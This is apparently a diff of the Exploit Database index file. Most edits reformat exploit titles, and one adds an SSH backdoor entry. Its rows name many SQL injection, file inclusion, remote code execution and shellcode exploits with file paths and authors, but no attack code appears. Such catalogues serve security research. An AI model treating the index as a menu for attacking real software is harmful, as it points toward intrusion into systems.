 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
+42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-14,"Simon Brannstrom",multiple,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -16615,7 +16619,7 @@ id,file,description,date,author,platform,type,port
 1069,platforms/php/webapps/1069.php,"UBBCentral UBB.Threads < 6.5.2 Beta - 'mailthread.php' SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0
 1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - 'article.asp' SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0
 1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - 'comment_post.asp' SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0
-1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0
+1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,php,webapps,0
 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0
 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0
 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0
@@ -16629,7 +16633,7 @@ id,file,description,date,author,platform,type,port
 1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,php,webapps,0
 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0
 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0
-1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - Remote PHP Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0
+1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0
 1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution",2005-07-25,newbug,cgi,webapps,0
 1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,php,webapps,0
 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps,0
@@ -16658,13 +16662,13 @@ id,file,description,date,author,platform,type,port
 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0
 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0
 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0
-1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0
+1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - 'board takeover' SQL Injection",2005-10-10,rgod,php,webapps,0
 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - 'quicklist.php' Remote Code Execution",2005-10-14,rgod,php,webapps,0
 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0
 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,php,webapps,0
 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps,0
 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,php,webapps,0
-1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) SQL Injection",2005-11-02,Devil-00,php,webapps,0
+1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - 'm' SQL Injection",2005-11-02,Devil-00,php,webapps,0
 1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - Shell Injection / Remote Command Execution",2005-11-03,rgod,php,webapps,0
 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0
 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0
@@ -16674,8 +16678,8 @@ id,file,description,date,author,platform,type,port
 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0
 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0
 1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
-1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
-1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - (msg/forum) SQL Injection",2005-11-16,rgod,php,webapps,0
+1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - 'TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
+1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,php,webapps,0
 1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection",2005-11-16,AhLam,php,webapps,0
 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0
 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0
@@ -16726,10 +16730,10 @@ id,file,description,date,author,platform,type,port
 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0
 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0
 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0
-1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - (title_op) SQL Injection",2006-02-14,x128,php,webapps,0
+1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,php,webapps,0
 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps,0
 1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0
-1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0
+1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,php,webapps,0
 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0
 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0
 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0
@@ -16849,13 +16853,13 @@ id,file,description,date,author,platform,type,port
 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - 'function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0
 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0
-1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0
-1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - (phpBB) File Inclusion",2006-04-28,[Oo],php,webapps,0
-1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - (phpBB Hack) Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0
-1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - (phpBB) Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0
+1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0
+1723,platforms/php/webapps/1723.txt,"Advanced Guestbook 2.4.0 - 'phpBB' File Inclusion",2006-04-28,[Oo],php,webapps,0
+1724,platforms/php/webapps/1724.pl,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (2)",2006-04-28,FOX_MULDER,php,webapps,0
+1725,platforms/php/webapps/1725.pl,"Advanced Guestbook 2.4.0 - 'phpBB' Remote File Inclusion",2006-04-28,n0m3rcy,php,webapps,0
 1726,platforms/php/webapps/1726.pl,"Invision Power Board 2.1.5 - search.php Remote Code Execution",2006-04-29,"Javier Olascoaga",php,webapps,0
 1727,platforms/php/webapps/1727.txt,"openPHPNuke 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
-1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - (phpBB) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
+1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 1729,platforms/php/webapps/1729.txt,"Limbo CMS 1.0.4.2 - 'sql.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
 1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
@@ -16880,10 +16884,10 @@ id,file,description,date,author,platform,type,port
 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server 8.23 - 'rf' Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0
 1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro 6.88 - 'rf' Remote File Inclusion",2006-05-08,ReZEN,php,webapps,0
 1769,platforms/php/webapps/1769.txt,"phpListPro 2.01 - Multiple Remote File Inclusion",2006-05-08,Aesthetico,php,webapps,0
-1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - (phpBB/SMF) Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0
-1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
+1773,platforms/php/webapps/1773.txt,"phpRaid 3.0.b3 - 'phpBB'/'SMF' Remote File Inclusion",2006-05-09,"Kurdish Security",php,webapps,0
+1774,platforms/php/webapps/1774.txt,"pafileDB 2.0.1 - 'mxBB'/'phpBB' Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0
-1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
+1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0
 1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0
@@ -16926,9 +16930,9 @@ id,file,description,date,author,platform,type,port
 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0
 1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
 1843,platforms/php/webapps/1843.txt,"UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
-1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0
+1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion",2006-05-28,nukedx,php,webapps,0
 1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0
-1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - (phpBB Mod) Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
+1846,platforms/php/webapps/1846.txt,"Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
 1847,platforms/php/webapps/1847.txt,"CosmicShoppingCart - 'search.php' SQL Injection",2006-05-28,Vympel,php,webapps,0
 1848,platforms/php/webapps/1848.txt,"Fastpublish CMS 1.6.9 - config[fsBase] Remote File Inclusion",2006-05-29,Kacper,php,webapps,0
 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0
@@ -17099,7 +17103,7 @@ id,file,description,date,author,platform,type,port
 2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0
 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0
-2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection (mq=off)",2006-08-01,rgod,php,webapps,0
+2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (mq=off) 'u2uid' SQL Injection",2006-08-01,rgod,php,webapps,0
 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion",2006-08-02,|peti,php,webapps,0
 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0
 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0
@@ -17222,7 +17226,7 @@ id,file,description,date,author,platform,type,port
 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2268,platforms/php/webapps/2268.php,"e107 < 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0
-2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0
+2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0
 2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps,0
 2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0
 2272,platforms/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",php,webapps,0
@@ -17238,7 +17242,7 @@ id,file,description,date,author,platform,type,port
 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0
 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0
 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0
-2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
+2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0
 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0
 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
@@ -17295,7 +17299,7 @@ id,file,description,date,author,platform,type,port
 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0
 2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0
 2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0
-2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0
+2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,asp,webapps,0
 2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - (script_path) Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0
 2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0
 2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Local/Remote File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0
@@ -17328,9 +17332,9 @@ id,file,description,date,author,platform,type,port
 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
 2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection",2006-09-19,x128,php,webapps,0
-2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) SQL Injection",2006-09-19,"Fix TR",asp,webapps,0
+2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",asp,webapps,0
 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0
-2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0
+2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0
 2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0
 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0
 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0
@@ -17338,7 +17342,7 @@ id,file,description,date,author,platform,type,port
 2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0
-2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0
+2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,php,webapps,0
 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0
@@ -17391,7 +17395,7 @@ id,file,description,date,author,platform,type,port
 2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0
 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - File Inclusion",2006-10-04,SpiderZ,php,webapps,0
 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps,0
-2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - phpbb_root_path File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0
+2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0
 2478,platforms/php/webapps/2478.txt,"phpMyTeam 2.0 - (smileys_dir) Remote File Inclusion",2006-10-05,"Mehmet Ince",php,webapps,0
 2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - 'index.php' SQL Injection",2006-10-05,Kzar,php,webapps,0
 2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion",2006-10-05,SpiderZ,php,webapps,0
@@ -17460,7 +17464,7 @@ id,file,description,date,author,platform,type,port
 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0
 2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
-2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
+2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0
 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0
 2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0
@@ -17472,9 +17476,9 @@ id,file,description,date,author,platform,type,port
 2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0
 2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0
 2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - 'comadd.php' SQL Injection",2006-10-15,SHiKaA,php,webapps,0
-2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0
+2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - 'getsquad' SQL Injection",2006-10-15,Kiba,php,webapps,0
 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore 4.4 - Remote File Inclusion",2006-10-16,Matdhule,php,webapps,0
-2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - GetRecord.php Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
+2572,platforms/php/webapps/2572.txt,"Osprey 1.0 - 'GetRecord.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0
 2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 - Adminfoot.php Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
 2574,platforms/php/webapps/2574.php,"Simplog 0.9.3.1 - comments.php SQL Injection",2006-10-16,w4ck1ng,php,webapps,0
 2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0
@@ -17557,14 +17561,14 @@ id,file,description,date,author,platform,type,port
 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - 'faq_reply.php' Remote File Inclusion",2006-10-29,v1per-haCker,php,webapps,0
 2679,platforms/php/webapps/2679.txt,"PHPMyRing 4.2.1 - 'cherche.php' SQL Injection",2006-10-29,ajann,php,webapps,0
 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0
-2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
-2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
+2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0
+2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - 'key' SQL Injection",2006-10-30,ajann,asp,webapps,0
 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0
 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0
 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0
 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0
 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0
-2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0
+2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0
 2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - 'themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0
 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0
 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0
@@ -17594,7 +17598,7 @@ id,file,description,date,author,platform,type,port
